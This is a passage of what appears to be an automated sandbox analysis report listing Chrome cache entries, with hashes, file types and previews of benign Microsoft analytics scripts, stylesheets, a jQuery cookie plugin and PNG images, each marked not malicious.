                                                                                                                      Preview:.PNG........IHDR... ... .....D.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...{PLTE.P".J$x......P".P".J$x.........K..K..K..D.o..w..w..w.........................................................P"...................$tRNS.DD...CC..DEC..CEDDEC..CED...CC...DD.c,8....bKGD(........pHYs...........~.....tIME....."4...4...QIDAT8...G.. ...Q..s....?......s.f..a`.A... .bA!..,/dYQ.....a.((j^.m?4..Q.?.....2>.........%tEXtdate:create.2020-05-28T22:34:52+02:00.t.....%tEXtdate:modify.2020-05-28T22:34:52+02:00.)<'...WzTXtRaw profile type iptc..x.....qV((.O..I.R..#..c..#.K.... D.4.d.#.T ...........H.J.....t.B5.....IEND.B`.

                                                                                                                      Chrome Cache Entry: 365

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65394)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):91802
                                                                                                                      Entropy (8bit):5.3603423050848615
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:C4F18VDgLMcb+0XbPN1xlJGFqCN3tcULcUoHfe:C4F18VDgLN9LN1mTn
                                                                                                                      MD5:CF5CC7F4B57526CC37893DCB83DED031
                                                                                                                      SHA1:E953783BE0A7894585778455AAE3D0DF094D6F29
                                                                                                                      SHA-256:3A790B6C0D26D7A4D292CB27F992EAFAFF42C37E9318B2AB704207039127FCB8
                                                                                                                      SHA-512:2320F9D7811CD773C1E5C2E95A31B39E9FF62A2FA7CA431975873DAB57AE42A75BA720D15AEB47FA2EA127D0766EB5AA15040CFFD04BF7A8CB8BCD7236069C40
                                                                                                                      Malicious:false
                                                                                                                      URL:https://js.monitor.azure.com/scripts/c/ms.shared.analytics.mectrl-3.gbl.min.js
                                                                                                                      Preview:/*!. * 1DS JS SDK Shared Analytics, 3.2.18. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,n){var t,r={},i="__ms$mod__",o={},a=o.esm_ms_shared_analytics_mectrl_3_2_18={},u="3.2.18",c="oneDsMeControl3",s=(s=e)[c]=s[c]||{},l=(l=e)[c="oneDsMeControl"]=l[c]||{},e=s[i]=s[i]||{},f=e.v=e.v||[],c=l[i]=l[i]||{},d=c.v=c.v||[];for(t in(c.o=c.o||[]).push(o),n(r),r)s[t]=r[t],f[t]=u,l[t]=r[t],d[t]=u,(a.n=a.n||[]).push(t)}(this,function(e){"use strict";!function(e,n,t){var r=Object.defineProperty;if(r)try{return r(e,n,t)}catch(i){}typeof t.value!==undefined&&(e[n]=t.value)}(e,"__esModule",{value:!0});var y="function",m="object",se="undefined",C="prototype",I="hasOwnProperty",b=Object,S=b[C],x=b.assign,w=b.create,n=b.defineProperty,_=S[I],T=null;function O(e){e=!1===(e=void 0===e||e)?null:T;return e||((e=(e=(e=typeof globalThis!==se?globalThis:e)||typeof self===se?e:self)||typeof window===se?e:window)||typeof global===se||(e=global),T=e),e

                                                                                                                      Chrome Cache Entry: 366

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (590)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):1716
                                                                                                                      Entropy (8bit):5.2304068952006615
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:4435HDQ258U3JqVnCG/6YyTrkzRLj9tSRAE9P:hU25ZqVC6ByTrWRLjSRAE9P
                                                                                                                      MD5:4CFFC2C9B55F8BDE649E0D2535A1EEBD
                                                                                                                      SHA1:2AAF4DF1E02ED4F5BB48F00A7423F748BF544E0C
                                                                                                                      SHA-256:7BB50A050792F761855CC330E0248D037B37DD68FD23FBB7DB8A7E8694F50A94
                                                                                                                      SHA-512:599C87219B7E264CFF8E6951192C691E26DFFA88EFC607EDFE9205F1BB08DA28FD61B508FAE93652BE36BE1ADA57E50661490925B247A43C3EB7F24D8CA0C8D0
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/microsoft/clientlibs/exp-analytics/v1.min.ACSHASH4cffc2c9b55f8bde649e0d2535a1eebd.js
                                                                                                                      Preview:'use strict';var experimentationAnalytics=function(){function g(a){return a&&0<a.length?!1:!0}function m(a){return Object.keys(a).map(function(b){return b+""+a[b]}).join("")}function n(a){var b=a.reduce(function(c,e){c[m(e)]=e;return c},{});return Object.keys(b).map(function(c){return b[c]})}function h(a){console.log("sendToVortex Call");a&&a.analytics&&f(a)}function k(a){return{actionType:"A",behavior:"12",content:JSON.stringify({}),pageTags:{tnta:a&&a.analytics?a.analytics.tnta:""}}}function l(a,.b){return{actionType:"A",behavior:"12",content:JSON.stringify({}),pageTags:{tnta:"",at_activity_name:a&&a.responseTokens[b]?a.responseTokens[b]["activity.name"]:"",at_exp_name:a&&a.responseTokens[b]?a.responseTokens[b]["experience.name"]:"",at_activity_id:a&&a.responseTokens[b]?a.responseTokens[b]["activity.id"]:"",at_exp_id:a&&a.responseTokens[b]?a.responseTokens[b]["experience.id"]:""}}}function f(a,b,c){b="number"===typeof b?b:25;c="number"===typeof c?c:200;var e=0;if(window.expAnalytics&

                                                                                                                      Chrome Cache Entry: 367

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):406
                                                                                                                      Entropy (8bit):4.999363379384117
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:ks6KjE5TkTDphV19fuYRTHVGeVphV1cRIKacdvNeJR4:kAI5gXpJ9fu8FpJgIK/dUf4
                                                                                                                      MD5:DF20EB81FA2AF3A1C0B0246A9A6A9485
                                                                                                                      SHA1:6A76AA264C75B186F9291C351373E89DC3B6D59B
                                                                                                                      SHA-256:99E81FEE9CAB25A579FDDFCA6EFCB65A196545FB79FD5FA5D711C5C377C4BFFF
                                                                                                                      SHA-512:22F39F69A3FC0A603DA2F169005B6CE35E21B3454C0379792F7DE266CE30063BE4F66B5264E04226B783AFD7E1328951174D470B0E1395AB4A3D4E52BCE73D77
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/mlsd/clientlibs/clientlib-experimentations.min.ACSHASHdf20eb81fa2af3a1c0b0246a9a6a9485.css
                                                                                                                      Preview:.experimentation{-webkit-box-ordinal-group:-1 !important;-ms-flex-order:-2 !important;order:-2 !important}..wayFindingModel-mlsd-exp.modal.show .modal-dialog{background:rgb(255,255,255,0.9);max-width:100% !important;justify-content:center}..wayFindingModel-mlsd-exp.modal.show .modal-dialog .modal-content{max-width:800px;border:1px solid #0067b8}..wayFindingModel-mlsd-exp .modal-images img{max-width:50%}

                                                                                                                      Chrome Cache Entry: 368

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (2674)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2728
                                                                                                                      Entropy (8bit):5.253272384445131
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:M1wQmQqQNrfAI4dz2eLNBxROk2oDZ8nVlnQiOk50NQclnmlnmZ5flnqlnuln5jBN:emQjNj4t2eLNgsdiQj+RacmVYU57vzKO
                                                                                                                      MD5:468D4ACC570CFFC7101AC8A63514AD31
                                                                                                                      SHA1:6983E89B6EC798B5B8C2B3B76D9311808437B572
                                                                                                                      SHA-256:B4B342F2025799CA602A75590B324E7493B0903726720BCE4CA793207C83255C
                                                                                                                      SHA-512:9042A219E8511FF281B9F680B3577CE3EAE29E881F24BE1D2B46C89D1F0013E30AA890C1A0181FF83975E125F62C0C6E896D3B8515067221143D9A3290B42865
                                                                                                                      Malicious:false
                                                                                                                      Preview:!function(){"use strict";var t,e,n=function(t){try{return sessionStorage.getItem(t)}catch(t){}return null};!function(t){t.EXPANDED="meControlAccountSelectorExpanded",t.COLLAPSED="meControlAccountSelectorCollapsed",t.SWITCHTYPE="meControlSwitchAccountType",t.SWITCHMSA="meControlSwitchMSAAccount",t.SWITCHAAD="meControlSwitchAADAccount"}(t||(t={})),function(t){t.REMOVE="teachingCalloutRemove",t.SHOWN="teachingCalloutShown",t.TIMEOUT="teachingCalloutTimeout"}(e||(e={}));var o,i,a=$("#meControl"),l=$("#smcTeachingCalloutPopover"),c=$("#teachingCalloutDismiss"),r="teachingCalloutShown";function d(t,e){var n,o={isAuto:!1,content:{contentId:e},behavior:t};null===(n=window.analytics)||void 0===n||n.captureContentUpdate(o)}$((function(){l&&l.length>0&&(function(t,e){if(t.length&&e.length){var n=t.offset().top;i=window.setInterval((function(){var o=e.offset().top;t.offset({top:n+o})}),15)}}(l,a),window.document.addEventListener("displayTeachingCallout",(function(t){try{if(null===n(r)&&null!=t.det

                                                                                                                      Chrome Cache Entry: 369

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (30237)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):30289
                                                                                                                      Entropy (8bit):5.260974426031687
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:u2E2n0SMB/2ZsJIjrAWJdvgmfQFc6mjVqMP62A86uIz3yR:u1M0S0/ks2JdImYFcw662A86vzyR
                                                                                                                      MD5:F04D3E51969894BD486CD9A9A1549EA6
                                                                                                                      SHA1:6DB7ED2E034FE99F5013144CA91DD21408F7AC36
                                                                                                                      SHA-256:33A747222E8AE5381AEB53C9671BB3EB309B7226587674CD6D901F99645A852B
                                                                                                                      SHA-512:C7BE3DAB8EF8DBCB3A0AA6022F8191F155358E4E974F0E42F9CD88C372EE77EB4513A6CC54E373CFE90232D67C6B02406B4D281D8158C24B51C8AA433452911C
                                                                                                                      Malicious:false
                                                                                                                      Preview:window.MSA=window.MSA||{};window.MSA.MeControl=window.MSA.MeControl||{};window.MSA.MeControl.Config={"ver":"10.24228.4","mkt":"en-US","ptn":"smcconvergence","gfx":"https://amcdn.msftauth.net","dbg":false,"aad":true,"int":false,"pxy":true,"msTxt":false,"rwd":true,"telEvs":"PageAction, PageView, ContentUpdate, OutgoingRequest, ClientError, PartnerApiCall, TrackedScenario","instKey":"b8ffe739c47a401190627519795ca4d2-044a8309-9d4b-430b-9d47-6e87775cbab6-6888","oneDSUrl":"https://js.monitor.azure.com/scripts/c/ms.shared.analytics.mectrl-3.gbl.min.js","remAcc":true,"main":"meBoot","wrapperId":"uhf","cdnRegex":"^(?:https?:\\/\\/)?(mem\\.gfx\\.ms(?!\\.)|controls\\.account.microsoft?(?:-int|-dev)?(\\.com)?(:[0-9]{1,6})|amcdn\\.ms(?:ft)?auth\\.net(?!\\.))","timeoutMs":30000,"graphv2":false,"graphinfo":{"graphclientid":null,"graphscope":null,"graphcodeurl":null,"graphredirecturi":null,"graphphotourl":null},"aadUrl":"https://myaccount.microsoft.com","msaUrl":"https://account.microsoft.com/","authA

                                                                                                                      Chrome Cache Entry: 370

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):211842
                                                                                                                      Entropy (8bit):5.548839465294018
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:DismT/mHKxQlVyDqBPAizS7Mzm3NLJa2lQn+S/7qSASyntnh:2smT+X+NLJab+SzqSASyntnh
                                                                                                                      MD5:C1338BAD680C7B30034BB2BEE2C447D3
                                                                                                                      SHA1:E93C535395F25D15F4AA67E481DFCEAF94F25A1E
                                                                                                                      SHA-256:906A3B2A89AA06A9C0DA125FBF248D1F9FD188511B44D4822D9E3FCFD28197E8
                                                                                                                      SHA-512:AE28ACA7B8AAB00F7EAF2B5EBCE86F23DD1B91E711100110ED4E2B7B6A68A1284AF777EC87C652789BBBC50B5FA95A18A47A1D1F5B1FF65FDBC6E56EE6FA31E7
                                                                                                                      Malicious:false
                                                                                                                      Preview:MeControlDefine("meBoot",["exports","@mecontrol/web-inline"],function(t,S){"use strict";var c=function(){},i={},u=[],p=[];function O(t,e){var r,n,o,i,a=p;for(i=arguments.length;2<i--;)u.push(arguments[i]);for(e&&null!=e.children&&(u.length||u.push(e.children),delete e.children);u.length;)if((n=u.pop())&&void 0!==n.pop)for(i=n.length;i--;)u.push(n[i]);else"boolean"==typeof n&&(n=null),(o="function"!=typeof t)&&(null==n?n="":"number"==typeof n?n=String(n):"string"!=typeof n&&(o=!1)),o&&r?a[a.length-1]+=n:a===p?a=[n]:a.push(n),r=o;var s=new c;return s.nodeName=t,s.children=a,s.attributes=null==e?void 0:e,s.key=null==e?void 0:e.key,s}function T(t,e){for(var r in e)t[r]=e[r];return t}function d(t,e){t&&("function"==typeof t?t(e):t.current=e)}var e="function"==typeof Promise?Promise.resolve().then.bind(Promise.resolve()):setTimeout;var l=/acit|ex(?:s|g|n|p|$)|rph|ows|mnc|ntw|ine[ch]|zoo|^ord/i,r=[];function a(t){!t._dirty&&(t._dirty=!0)&&1==r.push(t)&&e(n)}function n(){for(var t;t=r.pop();)t

                                                                                                                      Chrome Cache Entry: 371

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (6125), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):6125
                                                                                                                      Entropy (8bit):5.234103429010352
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:W/M/m/i8V//c//55T/hAh6QcVsOZdNABvQUSZacKp3xAxgBxjGYnvDYn79NN7ZuV:W8mi89/M/5xE6QcVsOZdNAJmotp3xAxU
                                                                                                                      MD5:97C18402D0D5AD89F12C548A55C8284F
                                                                                                                      SHA1:412ACD023C48FA79C9F846040497C74C2EBEC46D
                                                                                                                      SHA-256:464730FF27CB58E32D39C58E96330E89983298C72B1B4183A68E0B7FE4D4CCFA
                                                                                                                      SHA-512:38C551DBEC500AA1C450FDADE3E24FA16E71066F7CD75E103E6787C8687838E89BE49181C491F1234D29D7CCECA2B9C0C9FA20010548AD4E5F83D66D0AD1F02F
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/css/feedback/feedback.css?v=Rkcw_yfLWOMtOcWOljMOiZgymMcrG0GDpo4Lf-TUzPo
                                                                                                                      Preview:.smbArticleFluent #extendedFeedbackForm .extendedFeedbackArticleInfoUseful{height:auto;display:flex;justify-content:center;align-items:center;gap:32px}.smbArticleFluent #extendedFeedbackForm .extendedFeedbackArticleInfoUseful #beginFeedbackHeader{padding:0;margin:0}.smbArticleFluent #extendedFeedbackForm .extendedFeedbackArticleInfoUseful .extendedFeedbackHeader{font-family:"Segoe UI","Segoe UI Web","wf_segoe-ui_normal","Helvetica Neue","BBAlpha Sans","S60 Sans",Arial,sans-serif;font-size:16px;font-weight:600;line-height:20px;color:#333}.smbArticleFluent #extendedFeedbackForm .feedbackButtons{font-family:"Segoe UI","Segoe UI Web","wf_segoe-ui_normal","Helvetica Neue","BBAlpha Sans","S60 Sans",Arial,sans-serif;font-size:14px;font-weight:600;line-height:20px;display:flex;align-items:flex-start;gap:16px}.smbArticleFluent #extendedFeedbackForm .feedbackButtonBlue{min-width:auto;display:flex;padding:3px 40px;justify-content:center;align-items:center;border-radius:4px}.smbArticleFluent #exte

                                                                                                                      Chrome Cache Entry: 372

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):318713
                                                                                                                      Entropy (8bit):4.9382988876470755
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:owtki9QkGoO4QPwGY5DPMwqGsbkyvLUi4beyAX/bSe2yUXaemHqOOkwsik7oZtIm:Fj9p
                                                                                                                      MD5:F747282A2831677A6CB1C9CA4FE2B8FE
                                                                                                                      SHA1:5B58775E73BD52981112378D9CE936305FE95832
                                                                                                                      SHA-256:A5B1011E796F97DE920414F0C9A0D54291A16DB3325D2541A003A93D025492F2
                                                                                                                      SHA-512:AF25D86E3301E93136F399CACC31E3B037EA4FCF81B95FDA587F38D3D0CAA9286CC5C1C870C184FFE4DF6D773826535266F41D06EB7071357DB60B3970C92BC3
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-base.min.ACSHASHf747282a2831677a6cb1c9ca4fe2b8fe.css
                                                                                                                      Preview:.cmp-image__image{width:100%}..aem-Grid{display:block;width:100%}..aem-Grid::before,.aem-Grid::after{display:table;content:" "}..aem-Grid::after{clear:both}..aem-Grid-newComponent{clear:both;margin:0}..aem-GridColumn{box-sizing:border-box;clear:both}..aem-GridShowHidden>.aem-Grid>.aem-GridColumn{display:block !important}..aem-Grid.aem-Grid--1>.aem-GridColumn.aem-GridColumn--default--1{float:left;clear:none;width:100%}..aem-Grid.aem-Grid--1>.aem-GridColumn.aem-GridColumn--offset--default--0{margin-left:0}..aem-Grid.aem-Grid--1>.aem-GridColumn.aem-GridColumn--offset--default--1{margin-left:100%}..aem-Grid.aem-Grid--2>.aem-GridColumn.aem-GridColumn--default--1{float:left;clear:none;width:50%}..aem-Grid.aem-Grid--2>.aem-GridColumn.aem-GridColumn--default--2{float:left;clear:none;width:100%}..aem-Grid.aem-Grid--2>.aem-GridColumn.aem-GridColumn--offset--default--0{margin-left:0}..aem-Grid.aem-Grid--2>.aem-GridColumn.aem-GridColumn--offset--default--1{margin-left:50%}..aem-Grid.aem-Grid--2>.a

                                                                                                                      Chrome Cache Entry: 373

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (505)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1418
                                                                                                                      Entropy (8bit):5.418786110345074
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:gkWndJbDZVHGCGH0199EYCDNQNFHOS91AqCCoW40HJtmz2Xw+mlu4oFU5kveTOwD:gkw9ZVHG3HEuvNQNFv16XW1HJEkmEhUh
                                                                                                                      MD5:20AAFDF6904D3DC5DB0E0E33ABBFC1A4
                                                                                                                      SHA1:CC1A639FF69FE0D8A8F1EFEE7FCB04941E7B57C8
                                                                                                                      SHA-256:EE4E620F350907CE3867454B2BD45984BE949EB46B113183D4B8B403032DA14D
                                                                                                                      SHA-512:91B0BD81FCD2D3D040D9FC1DB74F5CA916EF88E7887D2868530BF1319EAF5462CC54421AB80FC97B258B569B9AF40F2B9FD1B6D417C9A4561BBA22EDF785D905
                                                                                                                      Malicious:false
                                                                                                                      Preview:/*. jQuery Cookie Plugin v1.4.1. https://github.com/carhartl/jquery-cookie.. Copyright 2013 Klaus Hartl. Released under the MIT license.*/.'use strict';(function(d){"function"===typeof define&&define.amd?define(["jquery"],d):"object"===typeof exports?d(require("jquery")):d(jQuery)})(function(d){function l(a,c){if(e.raw)var b=a;else a:{0===a.indexOf('"')&&(a=a.slice(1,-1).replace(/\\"/g,'"').replace(/\\\\/g,"\\"));try{a=decodeURIComponent(a.replace(m," "));b=e.json?JSON.parse(a):a;break a}catch(h){}b=void 0}return d.isFunction(c)?c(b):b}var m=/\+/g,e=d.cookie=function(a,c,b){if(void 0!==c&&!d.isFunction(c)){b=d.extend({},e.defaults,b);.if("number"===typeof b.expires){var h=b.expires,g=b.expires=new Date;g.setTime(+g+864E5*h)}a=e.raw?a:encodeURIComponent(a);c=e.json?JSON.stringify(c):String(c);c=e.raw?c:encodeURIComponent(c);return document.cookie=[a,"\x3d",c,b.expires?"; expires\x3d"+b.expires.toUTCString():"",b.path?"; path\x3d"+b.path:"",b.domain?"; domain\x3d"+b.domain:"",b.secure?";

                                                                                                                      Chrome Cache Entry: 374

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 594 x 332, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):18254
                                                                                                                      Entropy (8bit):7.950218967534029
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:4ZgtqkzeTs36Io/E0ZadkL8eExKAF+2/IEBTbztwaLAWoAGuJ:4aBzwWunZayL8eExKAFtQOTbzCak92
                                                                                                                      MD5:334DB99BB88BA472A3116C0B3A7449DE
                                                                                                                      SHA1:12B43CCBAA0A58336319B7AD981F8EECE202228F
                                                                                                                      SHA-256:2853C551260E74FD1BADFBBCBA7ADC12539FC2BBC6124516D3AE4F3BDD76A2CA
                                                                                                                      SHA-512:8AB869E0D4201A8F1BF2FDAE69524E481E80502D0881837D57B7ECF91075E0BE3A0DDFCD4E045B0CD5FEEFB405067A0EE76B1CFEA902C43D546AE9AF9F0DB469
                                                                                                                      Malicious:false
                                                                                                                      Preview:.PNG........IHDR...R...L.......R.....pHYs...%...%.IR$.....sRGB.........gAMA......a...F.IDATx..y.&Uu....P. .&"...........`...".!e$.e..M.Q..T.d...18....HJ+j.@R.E+&e"..,%K.B.f.?.Y..4.g..v....ow.>U]........o.s.;........a...\.-[....cIN3.......Pr<._.r.{B............[.).5k*..{..G.).n.........V....]n.{...5.....L..P+..%7.mW&,R..=..\...pu.T.s.J...._.....2........xW..s$TL.eCIu.9. $.INm..m.]{c_l*....~..q..x...G.........=..r.`Z.X.b.)PO-.Dg...Iu..v.R....F. .-....E.Hix......*57B.5.!.....".029...@O...}.r"..S.....a_..#....qhO..<..s.C..7.~.E..... .....}........,../2X...`...L..pZ.}...k...e..aM.u........k.^U~..z.@.f..2.:.......!*m.v.0........3D...}.&.$..@ZB-T.J.=.. .].+..>.....!..0SR7R.3.3m..)...0.....y..PFm...{<S....s.'...`!....z..O..y.u....@Zrp..b.c...=........:..:F.'+BJ..'.@..v.K.=..b.PU.h}.*.H...... .,R.R[..g.$....:........".\s{.8.Kh..F.hz..R.....&..'...%..)..S..m.......s.k.. cb..,....p.H.U.....")..t..)...Z...i.W..\.`!...S..C.5.Z..........$.j..b....l*em.t^..K...hr

                                                                                                                      Chrome Cache Entry: 375

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (780), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):780
                                                                                                                      Entropy (8bit):4.992440844788031
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:a4+A24uJEVdLV+awt+a9QdKCHXgc+a9aaXgc+a2XgcS:a4+xJEV9Vbwtb9QT1b9ac1bw1S
                                                                                                                      MD5:CB3531F56366637C3E928C625264646D
                                                                                                                      SHA1:3F6B2AC9B3A9C76EF8410FCA587105F1D95238A5
                                                                                                                      SHA-256:47F3F44C9BC3F47A111D004476F051D5684D9FB7526EF3985A6540F6D6B16E93
                                                                                                                      SHA-512:5E99E7DCADC11B1BD462D4CE8C1BF4334857E830EAFD4AECBD689F9C3869689D25A568C8B91ACEC69E7A6B1E2FD033DB47D7F84DC260F92BE3823203FCDB8D1A
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/css/ArticleSupportBridge/article-support-bridge.css?v=R_P0TJvD9HoRHQBEdvBR1WhNn7dSbvOYWmVA9taxbpM
                                                                                                                      Preview:.articleSupportBridge{margin-bottom:-40px}.articleSupportBridge .bridgeHeading{margin-top:40px;font-family:"Segoe UI Light","wf_segoe-ui_light",Arial,"Helvetica Neue",Verdana,Helvetica,Sans-Serif;font-size:2.4em;font-weight:bold;line-height:1.333;margin-bottom:15px}.articleSupportBridge .bridgeToken{margin-top:-30px}.articleSupportBridge .supportBridgeCTA{text-align:left;margin-top:-10px}.articleSupportBridge .supportBridgeText{text-align:left}.articleSupportBridge .phaseOneCTA{text-transform:uppercase;letter-spacing:.975px;text-decoration-style:solid;font-size:13px;text-align:left;font-weight:600}html[dir=rtl] .articleSupportBridge .supportBridgeText,html[dir=rtl] .articleSupportBridge .supportBridgeCTA,html[dir=rtl] .articleSupportBridge .phaseOneCTA{text-align:right}

                                                                                                                      Chrome Cache Entry: 376

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 594 x 332, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20879
                                                                                                                      Entropy (8bit):7.950262750419023
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:46Xz3aJorn/4FQhJt9fr1Ql3LyjJELj+Se9ouEkcQb0We77nGwIZOYjHmvGSZpV:4CaurgGn9fr1Q1GGLjVmsCa77GwIZfjM
                                                                                                                      MD5:133A012311EC0C7DC8900D41BFFE18E2
                                                                                                                      SHA1:A8344E3CB54AC529652411C13DE0FC9F18C72418
                                                                                                                      SHA-256:BC07BB9CDAECB6BB882CCD19058DD50E6376C9D0D4DAEB5576949CF80C1E5DF0
                                                                                                                      SHA-512:84AAE06C3C881FB388A4EB69478C3A15CCA7DDBC018C3D8942B772F9D30790322AC4398EF7C9F147BE3FFF14F63F184F3AD4BBB6666785704DB47DA43F1DC175
                                                                                                                      Malicious:false
                                                                                                                      Preview:.PNG........IHDR...R...L.......R.....pHYs...%...%.IR$.....sRGB.........gAMA......a...Q$IDATx.....Q.s..x...................1`G..2^y..<...p.k..M..:.'OJ.L.nU._DGw..[U...2S....o~....W..i...5c...,...x5v...5..Yu...u{.j..[K...J.G\...M.=I.e....5......!........oms.|r....Hd..e.(.,7...Qc.z.>|e.t.E...s..V.rJ.C.......AEI...Q.S.1..y..N.}R=.s.j.Z. .^..R.. ....T.....QV..H.gT.....N.4.<...H.&^V-...+..FHar...3.*Wt.F....h.....}.fY....R.K..~,.N.U.TN.,..*}n.W\.."..8....eE.(o...|.........cm.FDi..].9N.p.>j..%.fY7F...........p..q.......z..k...#..g.l.D..xi.;...&.....P.k....9=&.F~.._...."...V7.L...:.....Q..NX.j\Q...1KZA%....6P.VG......e<m.B.m..H!5r....Bg.h...f.';...y=...X.:B8i.R..Kz.U.t.&.ZB...(aZ....".!..F.T`w..&.Y.s.......|..6ZDi.D..D...RI..:wd+./G:&......Z.Z.m.).....5@..N.......X[no...*.5..k3.Q1Q..5!.\.&p..^.1MR|.M..d.r.....s..WJ...=s0.N....`.......V.S,Z5....#*..T4...B....n.DF.NZ...d....&..Mk..........N....D[..yJ.I:NE..*.j..M..T.2-iZ.E..$.F.V.;......R..X.'g..v+k.....C.

                                                                                                                      Chrome Cache Entry: 377

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (42133)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):138067
                                                                                                                      Entropy (8bit):5.225028044529473
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:1f4HuF7pxnISnJ9d1EwgXA7nKRZMK/xw/:1f4Hu1I+kw/
                                                                                                                      MD5:B9C3E4320DB870036919F1EE117BDA6E
                                                                                                                      SHA1:29B5A9066B5B1F1FE5AFE7EE986E80A49E86606A
                                                                                                                      SHA-256:A1FE019388875B696EDB373B51A51C0A8E3BAD52CD489617D042C0722BDB1E48
                                                                                                                      SHA-512:A878B55E8C65D880CDF14850BAEE1F82254C797C3284485498368F9128E42DCA46F54D9D92750EEEB547C42CAB9A9823AA9AFAB7D881090EBBFA1135CDD410B6
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/lib/uhf/dist/uhfbundle.js?v=of4Bk4iHW2lu2zc7UaUcCo47rVLNSJYX0ELAcivbHkg
                                                                                                                      Preview:(function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0

                                                                                                                      Chrome Cache Entry: 378

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):4565
                                                                                                                      Entropy (8bit):7.879534543139402
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:aSNKFuwJEQpaGX5wC3wglX5YEGdqsR1VsIAufA0E3xnMMV7:aSN3QpayvmEGdqsxsW7EhMMF
                                                                                                                      MD5:D596565EC1F100A507CC0D5F663B6D57
                                                                                                                      SHA1:6B688AA0541E5758B9A54C1848C6A52886E081BA
